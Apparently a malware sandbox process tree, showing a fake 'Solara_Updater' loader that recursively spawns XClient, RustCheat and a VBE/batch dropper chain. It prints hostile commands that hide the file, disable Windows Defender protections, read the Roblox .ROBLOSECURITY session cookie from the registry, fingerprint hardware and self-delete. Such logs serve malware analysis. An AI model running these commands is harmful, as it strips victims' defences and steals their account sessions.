C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"28⤵PID:2904
-
C:\Users\Admin\AppData\Local\Temp\Loader.exe"C:\Users\Admin\AppData\Local\Temp\Loader.exe"29⤵PID:300
-
C:\Users\Admin\AppData\Local\Temp\XClient.exe"C:\Users\Admin\AppData\Local\Temp\XClient.exe"30⤵PID:2028
-
-
C:\Users\Admin\AppData\Local\Temp\RustCheat.exe"C:\Users\Admin\AppData\Local\Temp\RustCheat.exe"30⤵PID:1952
-
-
-
C:\Users\Admin\AppData\Local\Temp\sol.exe"C:\Users\Admin\AppData\Local\Temp\sol.exe"29⤵PID:1292
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"30⤵PID:356
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "31⤵
- Loads dropped DLL
PID:1068 -
C:\hostNet\bridgeblockportComBroker.exe"C:\hostNet/bridgeblockportComBroker.exe"32⤵PID:2132
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"29⤵PID:3032
-
C:\Users\Admin\AppData\Local\Temp\Loader.exe"C:\Users\Admin\AppData\Local\Temp\Loader.exe"30⤵PID:2280
-
C:\Users\Admin\AppData\Local\Temp\XClient.exe"C:\Users\Admin\AppData\Local\Temp\XClient.exe"31⤵PID:832
-
-
C:\Users\Admin\AppData\Local\Temp\RustCheat.exe"C:\Users\Admin\AppData\Local\Temp\RustCheat.exe"31⤵PID:3068
-
-
-
C:\Users\Admin\AppData\Local\Temp\sol.exe"C:\Users\Admin\AppData\Local\Temp\sol.exe"30⤵PID:2944
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"31⤵PID:2224
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "32⤵
- Loads dropped DLL
PID:2376 -
C:\hostNet\bridgeblockportComBroker.exe"C:\hostNet/bridgeblockportComBroker.exe"33⤵PID:2680
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"30⤵PID:2128
-
C:\Users\Admin\AppData\Local\Temp\Loader.exe"C:\Users\Admin\AppData\Local\Temp\Loader.exe"31⤵PID:2340
-
C:\Users\Admin\AppData\Local\Temp\XClient.exe"C:\Users\Admin\AppData\Local\Temp\XClient.exe"32⤵PID:2444
-
-
C:\Users\Admin\AppData\Local\Temp\RustCheat.exe"C:\Users\Admin\AppData\Local\Temp\RustCheat.exe"32⤵
- Drops file in Drivers directory
PID:2720 -
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" csproduct get uuid33⤵PID:1664
-
-
C:\Windows\system32\attrib.exe"attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\RustCheat.exe"33⤵
- Views/modifies file attributes
PID:2544
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\RustCheat.exe'33⤵
- Command and Scripting Interpreter: PowerShell
PID:1564
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 33⤵PID:2420
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY33⤵PID:1604
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY33⤵PID:2840
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" os get Caption33⤵PID:868
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" computersystem get totalphysicalmemory33⤵PID:2556
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" csproduct get uuid33⤵PID:1464
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER33⤵PID:2436
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic" path win32_VideoController get name33⤵
- Detects videocard installed
PID:1052
-
-
C:\Windows\system32\cmd.exe"cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\RustCheat.exe" && pause33⤵PID:1752
-
C:\Windows\system32\PING.EXEping localhost34⤵
- Runs ping.exe
PID:2860
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\sol.exe"C:\Users\Admin\AppData\Local\Temp\sol.exe"31⤵PID:2172
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"32⤵PID:2188
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "33⤵
- Loads dropped DLL
PID:1660 -
C:\hostNet\bridgeblockportComBroker.exe"C:\hostNet/bridgeblockportComBroker.exe"34⤵PID:2568
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"31⤵PID:2052
-
C:\Users\Admin\AppData\Local\Temp\Loader.exe"C:\Users\Admin\AppData\Local\Temp\Loader.exe"32⤵PID:1516
-
C:\Users\Admin\AppData\Local\Temp\XClient.exe"C:\Users\Admin\AppData\Local\Temp\XClient.exe"33⤵PID:2060
-
-
C:\Users\Admin\AppData\Local\Temp\RustCheat.exe"C:\Users\Admin\AppData\Local\Temp\RustCheat.exe"33⤵PID:2384
-
-
-
C:\Users\Admin\AppData\Local\Temp\sol.exe"C:\Users\Admin\AppData\Local\Temp\sol.exe"32⤵PID:1088
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"33⤵PID:2540
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "34⤵
- Loads dropped DLL
PID:2792 -
C:\hostNet\bridgeblockportComBroker.exe"C:\hostNet/bridgeblockportComBroker.exe"35⤵PID:3060
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"32⤵PID:484
-
C:\Users\Admin\AppData\Local\Temp\Loader.exe"C:\Users\Admin\AppData\Local\Temp\Loader.exe"33⤵PID:2328
-
C:\Users\Admin\AppData\Local\Temp\XClient.exe"C:\Users\Admin\AppData\Local\Temp\XClient.exe"34⤵PID:2620
-
-
C:\Users\Admin\AppData\Local\Temp\RustCheat.exe"C:\Users\Admin\AppData\Local\Temp\RustCheat.exe"34⤵PID:1080
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" csproduct get uuid35⤵PID:3048
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\sol.exe"C:\Users\Admin\AppData\Local\Temp\sol.exe"33⤵PID:2104
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"34⤵PID:2180
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "35⤵
- Loads dropped DLL
PID:1564 -
C:\hostNet\bridgeblockportComBroker.exe"C:\hostNet/bridgeblockportComBroker.exe"36⤵PID:2368
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"33⤵PID:1256
-
C:\Users\Admin\AppData\Local\Temp\Loader.exe"C:\Users\Admin\AppData\Local\Temp\Loader.exe"34⤵PID:2172
-
-
C:\Users\Admin\AppData\Local\Temp\sol.exe"C:\Users\Admin\AppData\Local\Temp\sol.exe"34⤵PID:2688
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"35⤵PID:1880
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "36⤵
- Loads dropped DLL
PID:1580 -
C:\hostNet\bridgeblockportComBroker.exe"C:\hostNet/bridgeblockportComBroker.exe"37⤵PID:1060
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"34⤵PID:2376
-
C:\Users\Admin\AppData\Local\Temp\Loader.exe"C:\Users\Admin\AppData\Local\Temp\Loader.exe"35⤵PID:1716
-
-
C:\Users\Admin\AppData\Local\Temp\sol.exe"C:\Users\Admin\AppData\Local\Temp\sol.exe"35⤵PID:1564
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"36⤵PID:3016
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "37⤵
- Loads dropped DLL
PID:2512 -
C:\hostNet\bridgeblockportComBroker.exe"C:\hostNet/bridgeblockportComBroker.exe"38⤵PID:632
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"35⤵PID:2408
-
C:\Users\Admin\AppData\Local\Temp\Loader.exe"C:\Users\Admin\AppData\Local\Temp\Loader.exe"36⤵PID:2092
-
-
C:\Users\Admin\AppData\Local\Temp\sol.exe"C:\Users\Admin\AppData\Local\Temp\sol.exe"36⤵PID:1732
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"37⤵PID:1704
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "38⤵
- Loads dropped DLL
PID:1376 -
C:\hostNet\bridgeblockportComBroker.exe"C:\hostNet/bridgeblockportComBroker.exe"39⤵PID:1200
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"36⤵PID:2500
-
C:\Users\Admin\AppData\Local\Temp\Loader.exe"C:\Users\Admin\AppData\Local\Temp\Loader.exe"37⤵PID:1328
-
-
C:\Users\Admin\AppData\Local\Temp\sol.exe"C:\Users\Admin\AppData\Local\Temp\sol.exe"37⤵PID:1736
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"38⤵PID:2312
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "39⤵
- Loads dropped DLL
PID:2172 -
C:\hostNet\bridgeblockportComBroker.exe"C:\hostNet/bridgeblockportComBroker.exe"40⤵PID:2320
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"37⤵PID:1256
-
C:\Users\Admin\AppData\Local\Temp\Loader.exe"C:\Users\Admin\AppData\Local\Temp\Loader.exe"38⤵PID:800
-
-
C:\Users\Admin\AppData\Local\Temp\sol.exe"C:\Users\Admin\AppData\Local\Temp\sol.exe"38⤵PID:2768
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"39⤵PID:2860
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "40⤵
- Loads dropped DLL
PID:2984 -
C:\hostNet\bridgeblockportComBroker.exe"C:\hostNet/bridgeblockportComBroker.exe"41⤵PID:1172
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"38⤵PID:3012
-
C:\Users\Admin\AppData\Local\Temp\Loader.exe"C:\Users\Admin\AppData\Local\Temp\Loader.exe"39⤵PID:776
-
-
C:\Users\Admin\AppData\Local\Temp\sol.exe"C:\Users\Admin\AppData\Local\Temp\sol.exe"39⤵PID:2760
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"40⤵PID:2008
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "41⤵
- Loads dropped DLL
PID:2100 -
C:\hostNet\bridgeblockportComBroker.exe"C:\hostNet/bridgeblockportComBroker.exe"42⤵PID:984
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"39⤵PID:588
-
C:\Users\Admin\AppData\Local\Temp\Loader.exe"C:\Users\Admin\AppData\Local\Temp\Loader.exe"40⤵PID:2092
-
-
C:\Users\Admin\AppData\Local\Temp\sol.exe"C:\Users\Admin\AppData\Local\Temp\sol.exe"40⤵PID:2664
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"41⤵PID:900
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "42⤵
- Loads dropped DLL
PID:1516 -
C:\hostNet\bridgeblockportComBroker.exe"C:\hostNet/bridgeblockportComBroker.exe"43⤵PID:2956
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"40⤵PID:484
-
C:\Users\Admin\AppData\Local\Temp\Loader.exe"C:\Users\Admin\AppData\Local\Temp\Loader.exe"41⤵PID:1208
-
-
C:\Users\Admin\AppData\Local\Temp\sol.exe"C:\Users\Admin\AppData\Local\Temp\sol.exe"41⤵PID:2340
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"42⤵PID:1592
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "43⤵
- Loads dropped DLL
PID:300 -
C:\hostNet\bridgeblockportComBroker.exe"C:\hostNet/bridgeblockportComBroker.exe"44⤵PID:2568
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"41⤵PID:1308
-
C:\Users\Admin\AppData\Local\Temp\Loader.exe"C:\Users\Admin\AppData\Local\Temp\Loader.exe"42⤵PID:2716
-
-
C:\Users\Admin\AppData\Local\Temp\sol.exe"C:\Users\Admin\AppData\Local\Temp\sol.exe"42⤵PID:984
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"43⤵PID:1716
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "44⤵
- Loads dropped DLL
PID:2008 -
C:\hostNet\bridgeblockportComBroker.exe"C:\hostNet/bridgeblockportComBroker.exe"45⤵PID:752
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"42⤵PID:1188
-
C:\Users\Admin\AppData\Local\Temp\Loader.exe"C:\Users\Admin\AppData\Local\Temp\Loader.exe"43⤵PID:1808
-
C:\Users\Admin\AppData\Local\Temp\XClient.exe"C:\Users\Admin\AppData\Local\Temp\XClient.exe"44⤵PID:2332
-
-
C:\Users\Admin\AppData\Local\Temp\RustCheat.exe"C:\Users\Admin\AppData\Local\Temp\RustCheat.exe"44⤵PID:2456
-
-
-
C:\Users\Admin\AppData\Local\Temp\sol.exe"C:\Users\Admin\AppData\Local\Temp\sol.exe"43⤵PID:2988
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"44⤵PID:1156
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "45⤵
- Loads dropped DLL
PID:2672 -
C:\hostNet\bridgeblockportComBroker.exe"C:\hostNet/bridgeblockportComBroker.exe"46⤵PID:1460
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"43⤵PID:1032
-
C:\Users\Admin\AppData\Local\Temp\Loader.exe"C:\Users\Admin\AppData\Local\Temp\Loader.exe"44⤵PID:1124
-
-
C:\Users\Admin\AppData\Local\Temp\sol.exe"C:\Users\Admin\AppData\Local\Temp\sol.exe"44⤵PID:1764
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"45⤵PID:1712
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "46⤵
- Loads dropped DLL
PID:1896 -
C:\hostNet\bridgeblockportComBroker.exe"C:\hostNet/bridgeblockportComBroker.exe"47⤵PID:2256
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"44⤵PID:2484
-
C:\Users\Admin\AppData\Local\Temp\Loader.exe"C:\Users\Admin\AppData\Local\Temp\Loader.exe"45⤵PID:684
-
-
C:\Users\Admin\AppData\Local\Temp\sol.exe"C:\Users\Admin\AppData\Local\Temp\sol.exe"45⤵PID:2164
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"46⤵PID:2552
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "47⤵
- Loads dropped DLL
PID:2360 -
C:\hostNet\bridgeblockportComBroker.exe"C:\hostNet/bridgeblockportComBroker.exe"48⤵PID:1172
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"45⤵PID:2188
-
C:\Users\Admin\AppData\Local\Temp\Loader.exe"C:\Users\Admin\AppData\Local\Temp\Loader.exe"46⤵PID:1708
-
-
C:\Users\Admin\AppData\Local\Temp\sol.exe"C:\Users\Admin\AppData\Local\Temp\sol.exe"46⤵PID:2332
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"47⤵PID:3036
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "48⤵
- Loads dropped DLL
PID:2444 -
C:\hostNet\bridgeblockportComBroker.exe"C:\hostNet/bridgeblockportComBroker.exe"49⤵PID:2100
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"46⤵PID:1672
-
C:\Users\Admin\AppData\Local\Temp\Loader.exe"C:\Users\Admin\AppData\Local\Temp\Loader.exe"47⤵PID:1484
-
-
C:\Users\Admin\AppData\Local\Temp\sol.exe"C:\Users\Admin\AppData\Local\Temp\sol.exe"47⤵PID:2052
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"48⤵PID:2176
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "49⤵
- Loads dropped DLL
PID:2932 -
C:\hostNet\bridgeblockportComBroker.exe"C:\hostNet/bridgeblockportComBroker.exe"50⤵PID:304
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"47⤵PID:2740
-
C:\Users\Admin\AppData\Local\Temp\Loader.exe"C:\Users\Admin\AppData\Local\Temp\Loader.exe"48⤵PID:2180
-
-
C:\Users\Admin\AppData\Local\Temp\sol.exe"C:\Users\Admin\AppData\Local\Temp\sol.exe"48⤵PID:1664
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"49⤵PID:268
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "50⤵
- Loads dropped DLL
PID:1040 -
C:\hostNet\bridgeblockportComBroker.exe"C:\hostNet/bridgeblockportComBroker.exe"51⤵PID:1088
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"48⤵PID:316
-
C:\Users\Admin\AppData\Local\Temp\Loader.exe"C:\Users\Admin\AppData\Local\Temp\Loader.exe"49⤵PID:2076
-
-
C:\Users\Admin\AppData\Local\Temp\sol.exe"C:\Users\Admin\AppData\Local\Temp\sol.exe"49⤵PID:2352
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"50⤵PID:1800
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "51⤵
- Loads dropped DLL
PID:1764 -
C:\hostNet\bridgeblockportComBroker.exe"C:\hostNet/bridgeblockportComBroker.exe"52⤵PID:1544
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"49⤵PID:2272
-
C:\Users\Admin\AppData\Local\Temp\Loader.exe"C:\Users\Admin\AppData\Local\Temp\Loader.exe"50⤵PID:2700
-
-
C:\Users\Admin\AppData\Local\Temp\sol.exe"C:\Users\Admin\AppData\Local\Temp\sol.exe"50⤵PID:1048
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"51⤵PID:1212
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "52⤵
- Loads dropped DLL
PID:2400 -
C:\hostNet\bridgeblockportComBroker.exe"C:\hostNet/bridgeblockportComBroker.exe"53⤵PID:264
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"50⤵PID:1520
-
C:\Users\Admin\AppData\Local\Temp\Loader.exe"C:\Users\Admin\AppData\Local\Temp\Loader.exe"51⤵PID:2484
-
-
C:\Users\Admin\AppData\Local\Temp\sol.exe"C:\Users\Admin\AppData\Local\Temp\sol.exe"51⤵PID:3008
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"52⤵PID:1664
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "53⤵
- Loads dropped DLL
PID:2988 -
C:\hostNet\bridgeblockportComBroker.exe"C:\hostNet/bridgeblockportComBroker.exe"54⤵PID:1840
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"51⤵PID:720
-
C:\Users\Admin\AppData\Local\Temp\Loader.exe"C:\Users\Admin\AppData\Local\Temp\Loader.exe"52⤵PID:1880
-
-
C:\Users\Admin\AppData\Local\Temp\sol.exe"C:\Users\Admin\AppData\Local\Temp\sol.exe"52⤵PID:928
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"53⤵PID:2664
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "54⤵
- Loads dropped DLL
PID:1620 -
C:\hostNet\bridgeblockportComBroker.exe"C:\hostNet/bridgeblockportComBroker.exe"55⤵PID:2260
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"52⤵PID:908
-
C:\Users\Admin\AppData\Local\Temp\Loader.exe"C:\Users\Admin\AppData\Local\Temp\Loader.exe"53⤵PID:2404
-
C:\Users\Admin\AppData\Local\Temp\XClient.exe"C:\Users\Admin\AppData\Local\Temp\XClient.exe"54⤵PID:2692
-
-
C:\Users\Admin\AppData\Local\Temp\RustCheat.exe"C:\Users\Admin\AppData\Local\Temp\RustCheat.exe"54⤵PID:2440
-
-
-
C:\Users\Admin\AppData\Local\Temp\sol.exe"C:\Users\Admin\AppData\Local\Temp\sol.exe"53⤵PID:588
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"54⤵PID:1256
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "55⤵
- Loads dropped DLL
PID:2228 -
C:\hostNet\bridgeblockportComBroker.exe"C:\hostNet/bridgeblockportComBroker.exe"56⤵PID:1704
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"53⤵PID:3040
-
C:\Users\Admin\AppData\Local\Temp\Loader.exe"C:\Users\Admin\AppData\Local\Temp\Loader.exe"54⤵PID:1892
-
-
C:\Users\Admin\AppData\Local\Temp\sol.exe"C:\Users\Admin\AppData\Local\Temp\sol.exe"54⤵PID:2140
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"55⤵PID:1384
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "56⤵
- Loads dropped DLL
PID:2128 -
C:\hostNet\bridgeblockportComBroker.exe"C:\hostNet/bridgeblockportComBroker.exe"57⤵PID:2684
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"54⤵PID:2160
-
C:\Users\Admin\AppData\Local\Temp\Loader.exe"C:\Users\Admin\AppData\Local\Temp\Loader.exe"55⤵PID:1392
-
-
C:\Users\Admin\AppData\Local\Temp\sol.exe"C:\Users\Admin\AppData\Local\Temp\sol.exe"55⤵PID:2692
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"56⤵PID:2744
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "57⤵
- Loads dropped DLL
PID:3016 -
C:\hostNet\bridgeblockportComBroker.exe"C:\hostNet/bridgeblockportComBroker.exe"58⤵PID:2928
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"55⤵PID:2152
-
C:\Users\Admin\AppData\Local\Temp\Loader.exe"C:\Users\Admin\AppData\Local\Temp\Loader.exe"56⤵PID:2068
-
-
C:\Users\Admin\AppData\Local\Temp\sol.exe"C:\Users\Admin\AppData\Local\Temp\sol.exe"56⤵PID:3060
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"57⤵PID:988
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "58⤵
- Loads dropped DLL
PID:2540 -
C:\hostNet\bridgeblockportComBroker.exe"C:\hostNet/bridgeblockportComBroker.exe"59⤵PID:2348
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"56⤵PID:2824
-
